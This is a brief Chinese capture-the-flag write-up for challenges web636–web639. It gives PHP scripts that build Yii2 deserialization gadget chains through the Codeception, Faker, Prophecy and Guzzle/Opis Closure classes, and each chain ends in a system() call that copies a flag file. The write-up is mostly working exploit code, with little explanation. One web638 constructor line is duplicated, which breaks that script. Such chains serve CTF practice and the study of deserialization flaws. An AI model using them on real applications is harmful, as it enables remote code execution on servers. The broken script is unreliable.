web636
Yii2反序列化链
RunProcess->ValidGenerator
这里因为有报错信息,看不到命令执行结果,写到其他文件来查看。
<?php
namespace Faker{
class DefaultGenerator{
protected $default;
public function __construct($cmd)
{
$this->default = $cmd;
}
}
class ValidGenerator
{
protected $generator;
protected $validator;
protected $maxRetries;
public function __construct($cmd){
$this->generator=new DefaultGenerator($cmd);
$this->maxRetries=1;
$this->validator='system';
}
}
}
namespace Codeception\Extension{
use Faker\ValidGenerator;
class RunProcess{
private $processes = [] ;
function __construct($cmd)
{
$this->processes[] = new ValidGenerator($cmd);
}
}
echo(urlencode(serialize(new RunProcess('cat /flags_c > 1.txt'))));
}
web637
上题链被过滤
参考文章
RunProcess->ObjectProphecy->LazyDouble->Doubler->ClassCreator
分析就略了。。。(因为最新版的RunProcess被过滤了👻)
<?php
/***
* Created by joker
* Date 2021/9/7 20:02
***/
namespace Codeception\Extension;
use Prophecy\Prophecy\ObjectProphecy;
class RunProcess{
private $processes;
function __construct()
{
$a = new ObjectProphecy('1');
$this->processes[] = new ObjectProphecy($a);
}
}
echo urlencode(serialize(new RunProcess()));
namespace Prophecy\Prophecy;
use Prophecy\Doubler\LazyDouble;
class ObjectProphecy{
private $lazyDouble;
private $revealer;
function __construct($a)
{
$this->revealer = $a;
$this->lazyDouble = new LazyDouble();
}
}
namespace Prophecy\Doubler;
class LazyDouble{
private $doubler;
private $argument;
private $class;
private $interfaces;
function __construct()
{
$this->doubler =new Doubler();
$this->class = new \ReflectionClass('Exception');
$this->argument = array('fallingskies'=>'fallingskies');
$this->interfaces[] = new \ReflectionClass('Exception');
}
}
namespace Prophecy\Doubler\Generator\Node;
class ClassNode{
}
namespace Prophecy\Doubler;
use Prophecy\Doubler\Generator\Node\ClassNode;
use Faker\DefaultGenerator;
use Prophecy\Doubler\Generator\ClassCreator;
class Doubler{
private $mirror;
private $creator;
private $namer;
function __construct()
{
$this->namer = new DefaultGenerator('fallingskies');
$this->mirror = new DefaultGenerator(new ClassNode());
$this->creator = new ClassCreator();
}
}
namespace Faker;
class DefaultGenerator{
protected $default;
function __construct($default)
{
$this->default = $default;
}
}
namespace Prophecy\Doubler\Generator;
use Faker\DefaultGenerator;
class ClassCreator{
private $generator;
function __construct()
{
$this->generator = new DefaultGenerator('system("cat /flags_c > 1.txt");');
}
}
web638
参考文章:https://blog.csdn.net/Mrs_H/article/details/119928348
https://www.anquanke.com/post/id/251366#h2-6
https://xz.aliyun.com/t/9948
需要下一个闭包依赖Opis Closure
这条链算最复杂的一条了🤣
这里主要是用闭包函数,来解决call_user_func()只能控制第一个参数的情况。
<?php
namespace Codeception\Extension{
use Faker\DefaultGenerator;
use GuzzleHttp\Psr7\AppendStream;
class RunProcess{
protected $output;
private $processes = [];
public function __construct(){
$this->processes[]=new DefaultGenerator(new AppendStream());
$this->output=new DefaultGenerator('fallingskies');
}
}
echo urlencode(serialize(new RunProcess()));
}
namespace Faker{
class DefaultGenerator
{
protected $default;
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
use Faker\DefaultGenerator;
final class AppendStream{
private $streams = [];
private $seekable = true;
public function __construct(){
$this->streams[]=new CachingStream();
}
}
final class CachingStream{
private $remoteStream;
public function __construct(){
$this->remoteStream=new DefaultGenerator(false);
$this->stream=new PumpStream();
}
}
final class PumpStream{
private $source;
private $size=-10;
private $buffer;
public function __construct(){
public function __construct(){
$this->buffer=new DefaultGenerator('fallingskies');
include("closure/autoload.php");
$a = function(){system("cat /flags_c > 1.txt");};
$a = \Opis\Closure\serialize($a);
$b = unserialize($a);
$this->source=$b;
}
}
}
web639
同上